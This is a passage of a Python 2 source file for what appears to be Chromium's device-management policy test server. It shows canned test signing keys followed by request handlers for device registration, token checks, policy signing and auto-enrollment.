'ryQH9Af1Jw+dqs0RAbhcJXm2i8EUWIgNv6aMn1Z2DzZwKKjXsKgcYSRo8pdYa8RZAo'
'UExd9roA9a5w==',
}
},
# Key2
{'key':
'MIIBVAIBADANBgkqhkiG9w0BAQEFAASCAT4wggE6AgEAAkEAmZhreV04M3knCi6wibr49'
'oDesHny1G33PKOX9ko8pcxAiu9ZqsKCj7wNW2PGqnLi81fddACwQtYn5xdhCtzB9wIDAQ'
'ABAkA0z8m0cy8N08xundspoFZWO71WJLgv/peSDBYGI0RzJR1l9Np355EukQUQwRs5XrL'
'3vRQZy2vDqeiR96epkAhRAiEAzJ4DVI8k3pAl7CGv5icqFkJ02viExIwehhIEXBcB6p0C'
'IQDAKmzpoRpBEZRQ9xrTvPOi+Ea8Jnd478BU7CI/LFfgowIgMfLIoVWoDGRnvXKju60Hy'
'xNB70oHLut9cADp64j6QMkCIDrgxN4QbmrhaAAmtiGKE1wrlgCwCIsVamiasSOKAqLhAi'
'EAo/ItVcFtQPod97qG71CY/O4JzOciuU6AMhprs181vfM=',
'signatures':
# Key2 signatures
{'example.com':
'cO0nQjRptkeefKDw5QpJSQDavHABxUvbR9Wvoa235OG9Whw1RFqq2ye6pKnI3ezW6/'
'7b4ANcpi5a7HV5uF8K7gWyYdxY8NHLeyrbwXxg5j6HAmHmkP1UZcf/dAnWqo7cW8g4'
'DIQOhC43KkveMYJ2HnelwdXt/7zqkbe8/3Yj4nhjAUeARx86Sb8Nzydwkrvqs5Jw/x'
'5LG+BODExrXXcGu/ubDlW4ivJFqfNUPQysqBXSMY2XCHPJDx3eECLGVVN/fFAWWgjM'
'HFObAriAt0b18cc9Nr0mAt4Qq1oDzWcAHCPHE+5dr8Uf46BUrMLJRNRKCY7rrsoIin'
'9Be9gs3W+Aww==',
'chromepolicytest.com':
'mr+9CCYvR0cTvPwlzkxqlpGYy55gY7cPiIkPAPoql51yHK1tkMTOSFru8Dy/nMt+0o'
'4z7WO60F1wnIBGkQxnTj/DsO6QpCYi7oHqtLmZ2jsLQFlMyvPGUtpJEFvRwjr/TNbh'
'6RqUtz1LQFuJQ848kBrx7nkte1L8SuPDExgx+Q3LtbNj4SuTdvMUBMvEERXiLuwfFL'
'BefGjtsqfWETQVlJTCW7xcqOLedIX8UYgEDBpDOZ23A3GzCShuBsIut5m87R5mODht'
'EUmKNDK1+OMc6SyDpf+r48Wph4Db1bVaKy8fcpSNJOwEgsrmH7/+owKPGcN7I5jYAF'
'Z2PGxHTQ9JNA==',
'managedchrome.com':
'o5MVSo4bRwIJ/aooGyXpRXsEsWPG8fNA2UTG8hgwnLYhNeJCCnLs/vW2vdp0URE8jn'
'qiG4N8KjbuiGw0rJtO1EygdLfpnMEtqYlFjrOie38sy92l/AwohXj6luYzMWL+FqDu'
'WQeXasjgyY4s9BOLQVDEnEj3pvqhrk/mXvMwUeXGpbxTNbWAd0C8BTZrGOwU/kIXxo'
'vAMGg8L+rQaDwBTEnMsMZcvlrIyqSg5v4BxCWuL3Yd2xvUqZEUWRp1aKetsHRnz5hw'
'H7WK7DzvKepDn06XjPG9lchi448U3HB3PRKtCzfO3nD9YXMKTuqRpKPF8PeK11CWh1'
'DBvBYwi20vbQ==',
},
},
]
class PolicyRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Decodes and handles device management requests from clients.
The handler implements all the request parsing and protobuf message decoding
and encoding. It calls back into the server to lookup, register, and
unregister clients.
"""
def __init__(self, request, client_address, server):
"""Initialize the handler.
Args:
request: The request data received from the client as a string.
client_address: The client address.
server: The TestServer object to use for (un)registering clients.
"""
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, request,
client_address, server)
def GetUniqueParam(self, name):
"""Extracts a unique query parameter from the request.
Args:
name: Names the parameter to fetch.
Returns:
The parameter value or None if the parameter doesn't exist or is not
unique.
"""
if not hasattr(self, '_params'):
self._params = cgi.parse_qs(self.path[self.path.find('?') + 1:])
param_list = self._params.get(name, [])
if len(param_list) == 1:
return param_list[0]
return None
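  # For illustration: with self.path == '/policy?request=register&deviceid=x',
  # GetUniqueParam('request') returns 'register', while a repeated parameter
  # such as '?request=a&request=b' is not unique and yields None.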
def do_GET(self):
"""Handles GET requests.
Currently this is only used to serve external policy data."""
sep = self.path.find('?')
path = self.path if sep == -1 else self.path[:sep]
if path == '/externalpolicydata':
http_response, raw_reply = self.HandleExternalPolicyDataRequest()
elif path == '/configuration/test/exit':
# This is not part of the standard DM server protocol.
# This extension is added to make the test server exit gracefully
# when the test is complete.
self.server.stop = True
http_response = 200
raw_reply = 'OK'
elif path == '/test/ping':
# This path and reply are used by the test setup of host-driven tests for
# Android to determine if the server is up, and are not part of the
# DM protocol.
http_response = 200
raw_reply = 'Policy server is up.'
else:
http_response = 404
raw_reply = 'Invalid path'
self.send_response(http_response)
self.end_headers()
self.wfile.write(raw_reply)
def do_POST(self):
http_response, raw_reply = self.HandleRequest()
self.send_response(http_response)
if (http_response == 200):
self.send_header('Content-Type', 'application/x-protobuffer')
self.end_headers()
self.wfile.write(raw_reply)
def HandleExternalPolicyDataRequest(self):
"""Handles a request to download policy data for a component."""
policy_key = self.GetUniqueParam('key')
if not policy_key:
return (400, 'Missing key parameter')
data = self.server.ReadPolicyDataFromDataDir(policy_key)
if data is None:
return (404, 'Policy not found for ' + policy_key)
return (200, data)
def HandleRequest(self):
"""Handles a request.
Parses the data supplied at construction time and returns a pair indicating
http status code and response data to be sent back to the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
rmsg = dm.DeviceManagementRequest()
length = int(self.headers.getheader('content-length'))
rmsg.ParseFromString(self.rfile.read(length))
logging.debug('gaia auth token -> ' +
self.headers.getheader('Authorization', ''))
logging.debug('oauth token -> ' + str(self.GetUniqueParam('oauth_token')))
logging.debug('deviceid -> ' + str(self.GetUniqueParam('deviceid')))
self.DumpMessage('Request', rmsg)
request_type = self.GetUniqueParam('request')
# Check server side requirements, as defined in
# device_management_backend.proto.
    if (self.GetUniqueParam('devicetype') != '2' or
        self.GetUniqueParam('apptype') != 'Chrome' or
        not self.GetUniqueParam('deviceid') or
        len(self.GetUniqueParam('deviceid')) >= 64):
return (400, 'Invalid request parameter')
if request_type == 'register':
response = self.ProcessRegister(rmsg.register_request)
elif request_type == 'api_authorization':
response = self.ProcessApiAuthorization(rmsg.service_api_access_request)
elif request_type == 'unregister':
response = self.ProcessUnregister(rmsg.unregister_request)
elif request_type == 'policy':
response = self.ProcessPolicy(rmsg, request_type)
elif request_type == 'enterprise_check':
response = self.ProcessAutoEnrollment(rmsg.auto_enrollment_request)
elif request_type == 'device_state_retrieval':
response = self.ProcessDeviceStateRetrievalRequest(
rmsg.device_state_retrieval_request)
elif request_type == 'status_upload':
response = self.ProcessStatusUploadRequest(
rmsg.device_status_report_request, rmsg.session_status_report_request)
else:
return (400, 'Invalid request parameter')
if isinstance(response[1], basestring):
body = response[1]
elif isinstance(response[1], google.protobuf.message.Message):
self.DumpMessage('Response', response[1])
body = response[1].SerializeToString()
else:
body = ''
return (response[0], body)
def CreatePolicyForExternalPolicyData(self, policy_key):
"""Returns an ExternalPolicyData protobuf for policy_key.
If there is policy data for policy_key then the download url will be
set so that it points to that data, and the appropriate hash is also set.
Otherwise, the protobuf will be empty.
Args:
policy_key: The policy type and settings entity id, joined by '/'.
Returns:
A serialized ExternalPolicyData.
"""
settings = ep.ExternalPolicyData()
data = self.server.ReadPolicyDataFromDataDir(policy_key)
if data:
settings.download_url = urlparse.urljoin(
self.server.GetBaseURL(), 'externalpolicydata?key=%s' % policy_key)
settings.secure_hash = hashlib.sha256(data).digest()
return settings.SerializeToString()
def CheckGoogleLogin(self):
"""Extracts the auth token from the request and returns it. The token may
either be a GoogleLogin token from an Authorization header, or an OAuth V2
token from the oauth_token query parameter. Returns None if no token is
present.
"""
oauth_token = self.GetUniqueParam('oauth_token')
if oauth_token:
return oauth_token
match = re.match('GoogleLogin auth=(\\w+)',
self.headers.getheader('Authorization', ''))
if match:
return match.group(1)
return None
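  # For illustration: a header of 'Authorization: GoogleLogin auth=token123'
  # yields 'token123', as does a '?oauth_token=token123' query parameter,
  # with the query parameter taking precedence.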
def ProcessRegister(self, msg):
"""Handles a register request.
Checks the query for authorization and device identifier, registers the
device with the server and constructs a response.
Args:
msg: The DeviceRegisterRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
# Check the auth token and device ID.
auth = self.CheckGoogleLogin()
if not auth:
return (403, 'No authorization')
policy = self.server.GetPolicies()
if ('managed_users' not in policy):
return (500, 'error in config - no managed users')
username = self.server.ResolveUser(auth)
if ('*' not in policy['managed_users'] and
username not in policy['managed_users']):
return (403, 'Unmanaged')
device_id = self.GetUniqueParam('deviceid')
if not device_id:
return (400, 'Missing device identifier')
token_info = self.server.RegisterDevice(
device_id, msg.machine_id, msg.type, username)
# Send back the reply.
response = dm.DeviceManagementResponse()
response.register_response.device_management_token = (
token_info['device_token'])
response.register_response.machine_name = token_info['machine_name']
response.register_response.enrollment_type = token_info['enrollment_mode']
return (200, response)
def ProcessApiAuthorization(self, msg):
"""Handles an API authorization request.
Args:
msg: The DeviceServiceApiAccessRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
policy = self.server.GetPolicies()
# Return the auth code from the config file if it's defined. Default to an
# empty auth code, which will instruct the enrollment flow to skip robot
# auth setup.
response = dm.DeviceManagementResponse()
response.service_api_access_response.auth_code = policy.get(
'robot_api_auth_code', '')
return (200, response)
def ProcessUnregister(self, msg):
"""Handles a register request.
Checks for authorization, unregisters the device and constructs the
response.
Args:
msg: The DeviceUnregisterRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
# Check the management token.
token, response = self.CheckToken()
if not token:
return response
# Unregister the device.
self.server.UnregisterDevice(token['device_token'])
# Prepare and send the response.
response = dm.DeviceManagementResponse()
response.unregister_response.CopyFrom(dm.DeviceUnregisterResponse())
return (200, response)
def ProcessPolicy(self, msg, request_type):
"""Handles a policy request.
Checks for authorization, encodes the policy into protobuf representation
and constructs the response.
Args:
msg: The DeviceManagementRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
token_info, error = self.CheckToken()
if not token_info:
return error
key_update_request = msg.device_state_key_update_request
if len(key_update_request.server_backed_state_key) > 0:
self.server.UpdateStateKeys(token_info['device_token'],
key_update_request.server_backed_state_key)
# See whether the |username| for the client is known. During policy
# validation, the client verifies that the policy blob is bound to the
# appropriate user by comparing against this value. In case the server is
# configured to resolve the actual user name from the access token via the
# token info endpoint, the resolved |username| has been stored in
# |token_info| when the client registered. If not, pass None as the
# |username| in which case a value from the configuration file will be used.
username = token_info.get('username')
# If this is a |publicaccount| request, use the |settings_entity_id| from
# the request as the |username|. This is required to validate policy for
# extensions in device-local accounts.
for request in msg.policy_request.request:
if request.policy_type == 'google/chromeos/publicaccount':
username = request.settings_entity_id
response = dm.DeviceManagementResponse()
for request in msg.policy_request.request:
if (request.policy_type in
('google/android/user',
'google/chromeos/device',
'google/chromeos/publicaccount',
'google/chromeos/user',
'google/chrome/user',
'google/ios/user')):
fetch_response = response.policy_response.response.add()
self.ProcessCloudPolicy(request, token_info, fetch_response, username)
elif request.policy_type == 'google/chrome/extension':
self.ProcessCloudPolicyForExtensions(
request, response.policy_response, token_info, username)
      else:
        fetch_response = response.policy_response.response.add()
        fetch_response.error_code = 400
        fetch_response.error_message = 'Invalid policy_type'
return (200, response)
def ProcessAutoEnrollment(self, msg):
"""Handles an auto-enrollment check request.
The reply depends on the value of the modulus:
1: replies with no new modulus and the sha256 hash of "0"
2: replies with a new modulus, 4.
4: replies with a new modulus, 2.
8: fails with error 400.
16: replies with a new modulus, 16.
32: replies with a new modulus, 1.
anything else: replies with no new modulus and an empty list of hashes
    These allow the client to pick the testing scenario it wants to simulate.
Args:
msg: The DeviceAutoEnrollmentRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
auto_enrollment_response = dm.DeviceAutoEnrollmentResponse()
if msg.modulus == 1:
auto_enrollment_response.hash.extend(
self.server.GetMatchingStateKeyHashes(msg.modulus, msg.remainder))
elif msg.modulus == 2:
auto_enrollment_response.expected_modulus = 4
elif msg.modulus == 4:
auto_enrollment_response.expected_modulus = 2
elif msg.modulus == 8:
return (400, 'Server error')
elif msg.modulus == 16:
auto_enrollment_response.expected_modulus = 16
elif msg.modulus == 32:
auto_enrollment_response.expected_modulus = 1
response = dm.DeviceManagementResponse()
response.auto_enrollment_response.CopyFrom(auto_enrollment_response)
return (200, response)
def ProcessDeviceStateRetrievalRequest(self, msg):
"""Handles a device state retrieval request.
Response data is taken from server configuration.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
device_state_retrieval_response = dm.DeviceStateRetrievalResponse()
client = self.server.LookupByStateKey(msg.server_backed_state_key)
if client is not None:
state = self.server.GetPolicies().get('device_state', {})
FIELDS = [
'management_domain',
'restore_mode',
]
for field in FIELDS:
if field in state:
setattr(device_state_retrieval_response, field, state[field])
response = dm.DeviceManagementResponse()
response.device_state_retrieval_response.CopyFrom(
device_state_retrieval_response)
return (200, response)
def ProcessStatusUploadRequest(self, device_status, session_status):
"""Handles a device/session status upload request.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
# Empty responses indicate a successful upload.
device_status_report_response = dm.DeviceStatusReportResponse()
session_status_report_response = dm.SessionStatusReportResponse()
response = dm.DeviceManagementResponse()
response.device_status_report_response.CopyFrom(
device_status_report_response)
response.session_status_report_response.CopyFrom(
session_status_report_response)
return (200, response)
def SetProtobufMessageField(self, group_message, field, field_value):
"""Sets a field in a protobuf message.
Args:
group_message: The protobuf message.
field: The field of the message to set, it should be a member of
group_message.DESCRIPTOR.fields.
field_value: The value to set.
"""
if field.label == field.LABEL_REPEATED:
assert type(field_value) == list
entries = group_message.__getattribute__(field.name)
if field.message_type is None:
for list_item in field_value:
entries.append(list_item)
else:
# This field is itself a protobuf.
sub_type = field.message_type
for sub_value in field_value:
assert type(sub_value) == dict
# Add a new sub-protobuf per list entry.
sub_message = entries.add()
# Now iterate over its fields and recursively add them.
for sub_field in sub_message.DESCRIPTOR.fields:
if sub_field.name in sub_value:
value = sub_value[sub_field.name]
self.SetProtobufMessageField(sub_message, sub_field, value)
return
elif field.type == field.TYPE_BOOL:
assert type(field_value) == bool
elif field.type == field.TYPE_STRING:
assert type(field_value) == str or type(field_value) == unicode
elif field.type == field.TYPE_INT64:
assert type(field_value) == int
elif (field.type == field.TYPE_MESSAGE and
field.message_type.name == 'StringList'):
assert type(field_value) == list
entries = group_message.__getattribute__(field.name).entries
for list_item in field_value:
entries.append(list_item)
return
else:
raise Exception('Unknown field type %s' % field.type)
group_message.__setattr__(field.name, field_value)
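  # For illustration (assuming a StringList-typed policy field exists in the
  # proto), a JSON config entry such as
  #   "URLBlacklist": ["example.com", "example.org"]
  # is appended item by item to group_message.URLBlacklist.entries via the
  # StringList branch above, while scalar fields are set directly.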
def GatherDevicePolicySettings(self, settings, policies):
"""Copies all the policies from a dictionary into a protobuf of type
CloudDeviceSettingsProto.
Args:
settings: The destination ChromeDeviceSettingsProto protobuf.
policies: The source dictionary containing policies in JSON format.
"""
for group in settings.DESCRIPTOR.fields:
# Create protobuf message for group.
group_message = eval('dp.' + group.message_type.name + '()')
# Indicates if at least one field was set in |group_message|.
got_fields = False
# Iterate over fields of the message and feed them from the
# policy config file.
for field in group_message.DESCRIPTOR.fields:
field_value = None
if field.name in policies:
got_fields = True
field_value = policies[field.name]
self.SetProtobufMessageField(group_message, field, field_value)
if got_fields:
settings.__getattribute__(group.name).CopyFrom(group_message)
def GatherUserPolicySettings(self, settings, policies):
"""Copies all the policies from a dictionary into a protobuf of type
CloudPolicySettings.
Args:
settings: The destination: a CloudPolicySettings protobuf.
policies: The source: a dictionary containing policies under keys
'recommended' and 'mandatory'.
"""
for field in settings.DESCRIPTOR.fields:
# |field| is the entry for a specific policy in the top-level
# CloudPolicySettings proto.
# Look for this policy's value in the mandatory or recommended dicts.
if field.name in policies.get('mandatory', {}):
mode = cp.PolicyOptions.MANDATORY
value = policies['mandatory'][field.name]
elif field.name in policies.get('recommended', {}):
mode = cp.PolicyOptions.RECOMMENDED
value = policies['recommended'][field.name]
else:
continue
# Create protobuf message for this policy.
policy_message = eval('cp.' + field.message_type.name + '()')
policy_message.policy_options.mode = mode
field_descriptor = policy_message.DESCRIPTOR.fields_by_name['value']
self.SetProtobufMessageField(policy_message, field_descriptor, value)
settings.__getattribute__(field.name).CopyFrom(policy_message)
def ProcessCloudPolicyForExtensions(self, request, response, token_info,
username=None):
"""Handles a request for policy for extensions.
A request for policy for extensions is slightly different from the other
cloud policy requests, because it can trigger 0, one or many
PolicyFetchResponse messages in the response.
Args:
request: The PolicyFetchRequest that triggered this handler.
response: The DevicePolicyResponse message for the response. Multiple
PolicyFetchResponses will be appended to this message.
token_info: The token extracted from the request.
username: The username for the response. May be None.
"""
# Send one PolicyFetchResponse for each extension that has
# configuration data at the server.
ids = self.server.ListMatchingComponents('google/chrome/extension')
for settings_entity_id in ids:
# Reuse the extension policy request, to trigger the same signature
# type in the response.
request.settings_entity_id = settings_entity_id
fetch_response = response.response.add()
self.ProcessCloudPolicy(request, token_info, fetch_response, username)
# Don't do key rotations for these messages.
fetch_response.ClearField('new_public_key')
fetch_response.ClearField('new_public_key_signature')
fetch_response.ClearField('new_public_key_verification_signature')
def ProcessCloudPolicy(self, msg, token_info, response, username=None):
"""Handles a cloud policy request. (New protocol for policy requests.)
Encodes the policy into protobuf representation, signs it and constructs
the response.
Args:
msg: The CloudPolicyRequest message received from the client.
token_info: The token extracted from the request.
response: A PolicyFetchResponse message that should be filled with the
response data.
username: The username for the response. May be None.
"""
if msg.machine_id:
self.server.UpdateMachineId(token_info['device_token'], msg.machine_id)
# Response is only given if the scope is specified in the config file.
# Normally 'google/chromeos/device', 'google/chromeos/user' and
# 'google/chromeos/publicaccount' should be accepted.
policy = self.server.GetPolicies()
policy_value = ''
policy_key = msg.policy_type
if msg.settings_entity_id:
policy_key += '/' + msg.settings_entity_id
if msg.policy_type in token_info['allowed_policy_types']:
if msg.policy_type in ('google/android/user',
'google/chromeos/publicaccount',
'google/chromeos/user',
'google/chrome/user',
'google/ios/user'):
settings = cp.CloudPolicySettings()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
self.GatherUserPolicySettings(settings, policy.get(policy_key, {}))
payload = settings.SerializeToString()
elif msg.policy_type == 'google/chromeos/device':
settings = dp.ChromeDeviceSettingsProto()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
self.GatherDevicePolicySettings(settings, policy.get(policy_key, {}))
payload = settings.SerializeToString()
elif msg.policy_type == 'google/chrome/extension':
settings = ep.ExternalPolicyData()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
payload = self.CreatePolicyForExternalPolicyData(policy_key)
else:
response.error_code = 400
response.error_message = 'Invalid policy type'
return
else:
response.error_code = 400
response.error_message = 'Request not allowed for the token used'
return
# Sign with 'current_key_index', defaulting to key 0.
signing_key = None
req_key = None
current_key_index = policy.get('current_key_index', 0)
nkeys = len(self.server.keys)
if (msg.signature_type == dm.PolicyFetchRequest.SHA1_RSA and
current_key_index in range(nkeys)):
signing_key = self.server.keys[current_key_index]
if msg.public_key_version in range(1, nkeys + 1):
# requested key exists, use for signing and rotate.
req_key = self.server.keys[msg.public_key_version - 1]['private_key']
# Fill the policy data protobuf.
policy_data = dm.PolicyData()
policy_data.policy_type = msg.policy_type
policy_data.timestamp = int(time.time() * 1000)
policy_data.request_token = token_info['device_token']
policy_data.policy_value = payload
policy_data.machine_name = token_info['machine_name']
policy_data.valid_serial_number_missing = (
token_info['machine_id'] in BAD_MACHINE_IDS)
policy_data.settings_entity_id = msg.settings_entity_id
policy_data.service_account_identity = policy.get(
'service_account_identity',
'policy_testserver.py-service_account_identity')
invalidation_source = policy.get('invalidation_source')
if invalidation_source is not None:
policy_data.invalidation_source = invalidation_source
# Since invalidation_name is type bytes in the proto, the Unicode name
# provided needs to be encoded as ASCII to set the correct byte pattern.
invalidation_name = policy.get('invalidation_name')
if invalidation_name is not None:
policy_data.invalidation_name = invalidation_name.encode('ascii')
if signing_key:
policy_data.public_key_version = current_key_index + 1
if username:
policy_data.username = username
else:
# If the correct |username| is unknown, rely on a manually-configured
# username from the configuration file or use a default.
policy_data.username = policy.get('policy_user', 'user@example.com')
policy_data.device_id = token_info['device_id']
    # Set affiliation IDs so that the user is managed on the device.
device_affiliation_ids = policy.get('device_affiliation_ids')
if device_affiliation_ids:
policy_data.device_affiliation_ids.extend(device_affiliation_ids)
user_affiliation_ids = policy.get('user_affiliation_ids')
if user_affiliation_ids:
policy_data.user_affiliation_ids.extend(user_affiliation_ids)
signed_data = policy_data.SerializeToString()
response.policy_data = signed_data
if signing_key:
response.policy_data_signature = (
bytes(signing_key['private_key'].hashAndSign(signed_data)))
if msg.public_key_version != current_key_index + 1:
response.new_public_key = signing_key['public_key']
# Set the verification signature appropriate for the policy domain.
# TODO(atwilson): Use the enrollment domain for public accounts when
# we add key validation for ChromeOS (http://crbug.com/328038).
if 'signatures' in signing_key:
verification_sig = self.GetSignatureForDomain(
signing_key['signatures'], policy_data.username)
if verification_sig:
assert len(verification_sig) == 256, \
'bad signature size: %d' % len(verification_sig)
response.new_public_key_verification_signature = verification_sig
if req_key:
response.new_public_key_signature = (
bytes(req_key.hashAndSign(response.new_public_key)))
return (200, response.SerializeToString())
def GetSignatureForDomain(self, signatures, username):
parsed_username = username.split("@", 1)
if len(parsed_username) != 2:
logging.error('Could not extract domain from username: %s' % username)
return None
domain = parsed_username[1]
# Lookup the domain's signature in the passed dictionary. If none is found,
# fallback to a wildcard signature.
if domain in signatures:
return signatures[domain]
if '*' in signatures:
return signatures['*']
# No key matching this domain.
logging.error('No verification signature matching domain: %s' % domain)
return None
def CheckToken(self):
"""Helper for checking whether the client supplied a valid DM token.
    Extracts the token from the request and passes it to the server in order to
look up the client.
Returns:
A pair of token information record and error response. If the first
element is None, then the second contains an error code to send back to
the client. Otherwise the first element is the same structure that is
returned by LookupToken().
"""
error = 500
dmtoken = None
request_device_id = self.GetUniqueParam('deviceid')
match = re.match('GoogleDMToken token=(\\w+)',
self.headers.getheader('Authorization', ''))
if match:
dmtoken = match.group(1)
if not dmtoken:
error = 401
else:
token_info = self.server.LookupToken(dmtoken)
if (not token_info or
not request_device_id or
token_info['device_id'] != request_device_id):
error = 410
else:
return (token_info, None)
logging.debug('Token check failed with error %d' % error)
return (None, (error, 'Server error %d' % error))
def DumpMessage(self, label, msg):
"""Helper for logging an ASCII dump of a protobuf message."""
logging.debug('%s\n%s' % (label, str(msg)))
class PolicyTestServer(testserver_base.BrokenPipeHandlerMixIn,
testserver_base.StoppableHTTPServer):
"""Handles requests and keeps global service state."""
def __init__(self, server_address, data_dir, policy_path, client_state_file,
private_key_paths, server_base_url):
"""Initializes the server.
Args:
server_address: Server host and port.
policy_path: Names the file to read JSON-formatted policy from.
private_key_paths: List of paths to read private keys from.
"""
testserver_base.StoppableHTTPServer.__init__(self, server_address,
PolicyRequestHandler)
self._registered_tokens = {}
self.data_dir = data_dir
self.policy_path = policy_path
self.client_state_file = client_state_file
self.server_base_url = server_base_url
self.keys = []
if private_key_paths:
# Load specified keys from the filesystem.
for key_path in private_key_paths:
try:
key_str = open(key_path).read()
except IOError:
print 'Failed to load private key from %s' % key_path
continue
try:
key = tlslite.api.parsePEMKey(key_str, private=True)
except SyntaxError:
key = tlslite.utils.python_rsakey.Python_RSAKey._parsePKCS8(
bytearray(key_str))
assert key is not None
key_info = { 'private_key' : key }
# Now try to read in a signature, if one exists.
try:
key_sig = open(key_path + '.sig').read()
# Create a dictionary with the wildcard domain + signature
key_info['signatures'] = {'*': key_sig}
except IOError:
print 'Failed to read validation signature from %s.sig' % key_path
self.keys.append(key_info)
else:
# Use the canned private keys if none were passed from the command line.
for signing_key in SIGNING_KEYS:
        decoded_key = base64.b64decode(signing_key['key'])
key = tlslite.utils.python_rsakey.Python_RSAKey._parsePKCS8(
bytearray(decoded_key))
assert key is not None
# Grab the signature dictionary for this key and decode all of the
# signatures.
signature_dict = signing_key['signatures']
decoded_signatures = {}
for domain in signature_dict:
decoded_signatures[domain] = base64.b64decode(signature_dict[domain])
self.keys.append({'private_key': key,
'signatures': decoded_signatures})
# Derive the public keys from the private keys.
for entry in self.keys:
key = entry['private_key']
algorithm = asn1der.Sequence(
[ asn1der.Data(asn1der.OBJECT_IDENTIFIER, PKCS1_RSA_OID),
asn1der.Data(asn1der.NULL, '') ])
rsa_pubkey = asn1der.Sequence([ asn1der.Integer(key.n),
asn1der.Integer(key.e) ])
pubkey = asn1der.Sequence([ algorithm, asn1der.Bitstring(rsa_pubkey) ])
entry['public_key'] = pubkey
# Load client state.
if self.client_state_file is not None:
try:
file_contents = open(self.client_state_file).read()
self._registered_tokens = json.loads(file_contents, strict=False)
except IOError:
pass
def GetPolicies(self):
"""Returns the policies to be used, reloaded from the backend file every
time this is called.
"""
policy = {}
if json is None:
logging.error('No JSON module, cannot parse policy information')
    else:
try:
policy = json.loads(open(self.policy_path).read(), strict=False)
except IOError:
logging.error('Failed to load policies from %s' % self.policy_path)
return policy
def ResolveUser(self, auth_token):
"""Tries to resolve an auth token to the corresponding user name.
If enabled, this makes a request to the token info endpoint to determine the
user ID corresponding to the token. If token resolution is disabled or the
request fails, this will return the policy_user config parameter.
"""
config = self.GetPolicies()
token_info_url = config.get('token_info_url')
if token_info_url is not None:
try:
token_info = urllib2.urlopen(token_info_url + '?' +
urllib.urlencode({'access_token': auth_token})).read()
return json.loads(token_info)['email']
except Exception as e:
logging.info('Failed to resolve user: %s', e)
return config.get('policy_user')
def RegisterDevice(self, device_id, machine_id, type, username):
"""Registers a device or user and generates a DM token for it.
Args:
device_id: The device identifier provided by the client.
Returns:
The newly generated device token for the device.
"""
dmtoken_chars = []
while len(dmtoken_chars) < 32:
dmtoken_chars.append(random.choice('0123456789abcdef'))
dmtoken = ''.join(dmtoken_chars)
allowed_policy_types = {
dm.DeviceRegisterRequest.BROWSER: [
'google/chrome/user',
'google/chrome/extension'
],
dm.DeviceRegisterRequest.USER: [
'google/chromeos/user',
'google/chrome/extension'
],
dm.DeviceRegisterRequest.DEVICE: [
'google/chromeos/device',
'google/chromeos/publicaccount',
'google/chrome/extension'
],
dm.DeviceRegisterRequest.ANDROID_BROWSER: [
'google/android/user'
],
dm.DeviceRegisterRequest.IOS_BROWSER: [
'google/ios/user'
],
dm.DeviceRegisterRequest.TT: ['google/chromeos/user',
'google/chrome/user'],
}
if machine_id in KIOSK_MACHINE_IDS:
enrollment_mode = dm.DeviceRegisterResponse.RETAIL
else:
enrollment_mode = dm.DeviceRegisterResponse.ENTERPRISE
self._registered_tokens[dmtoken] = {
'device_id': device_id,
'device_token': dmtoken,
'allowed_policy_types': allowed_policy_types[type],
'machine_name': 'chromeos-' + machine_id,
'machine_id': machine_id,
'enrollment_mode': enrollment_mode,
'username': username,
}
self.WriteClientState()
return self._registered_tokens[dmtoken]
def UpdateMachineId(self, dmtoken, machine_id):
"""Updates the machine identifier for a registered device.
Args:
dmtoken: The device management token provided by the client.
machine_id: Updated hardware identifier value.
"""
if dmtoken in self._registered_tokens:
self._registered_tokens[dmtoken]['machine_id'] = machine_id
self.WriteClientState()
def UpdateStateKeys(self, dmtoken, state_keys):
"""Updates the state keys for a given client.
Args:
dmtoken: The device management token provided by the client.
state_keys: The state keys to set.
"""
if dmtoken in self._registered_tokens:
self._registered_tokens[dmtoken]['state_keys'] = map(
lambda key : key.encode('hex'), state_keys)
self.WriteClientState()
def LookupToken(self, dmtoken):
"""Looks up a device or a user by DM token.
Args:
dmtoken: The device management token provided by the client.
Returns:
A dictionary with information about a device or user that is registered by
dmtoken, or None if the token is not found.
"""
return self._registered_tokens.get(dmtoken, None)
def LookupByStateKey(self, state_key):
"""Looks up a device or a user by a state key.
Args:
state_key: The state key provided by the client.
Returns:
A dictionary with information about a device or user or None if there is
no matching record.
"""
for client in self._registered_tokens.values():
if state_key.encode('hex') in client.get('state_keys', []):
return client
return None
def GetMatchingStateKeyHashes(self, modulus, remainder):
"""Returns all clients registered with the server.
Returns:
The list of registered clients.
"""
state_keys = sum([ c.get('state_keys', [])
for c in self._registered_tokens.values() ], [])
hashed_keys = map(lambda key: hashlib.sha256(key.decode('hex')).digest(),
set(state_keys))
return filter(
lambda hash : int(hash.encode('hex'), 16) % modulus == remainder,
hashed_keys)
def UnregisterDevice(self, dmtoken):
"""Unregisters a device identified by the given DM token.
Args:
dmtoken: The device management token provided by the client.
"""
if dmtoken in self._registered_tokens.keys():
del self._registered_tokens[dmtoken]
self.WriteClientState()
def WriteClientState(self):
"""Writes the client state back to the file."""
if self.client_state_file is not None:
json_data = json.dumps(self._registered_tokens)
open(self.client_state_file, 'w').write(json_data)
def GetBaseFilename(self, policy_selector):
"""Returns the base filename for the given policy_selector.
Args:
policy_selector: The policy type and settings entity id, joined by '/'.
Returns:
The filename corresponding to the policy_selector, without a file
extension.
"""
sanitized_policy_selector = re.sub('[^A-Za-z0-9.@-]', '_', policy_selector)
return os.path.join(self.data_dir or '',
'policy_%s' % sanitized_policy_selector)
def ListMatchingComponents(self, policy_type):
"""Returns a list of settings entity IDs that have a configuration file.
Args:
policy_type: The policy type to look for. Only settings entity IDs for
          file selectors that match this policy_type will be returned.
Returns:
A list of settings entity IDs for the given |policy_type| that have a
configuration file in this server (either as a .bin, .txt or .data file).
"""
base_name = self.GetBaseFilename(policy_type)
files = glob.glob('%s_*.*' % base_name)
len_base_name = len(base_name) + 1
